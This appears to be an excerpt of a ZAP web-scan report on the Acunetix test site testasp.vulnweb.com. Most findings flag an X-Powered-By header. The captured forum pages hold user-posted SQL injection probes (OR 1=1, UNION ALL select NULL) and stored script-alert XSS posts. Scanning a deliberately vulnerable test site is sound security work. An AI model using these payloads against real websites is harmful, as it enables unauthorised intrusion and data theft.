POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 13536 |
| Response Body - size: 13,536 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 4913 |
| Response Body - size: 4,913 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' 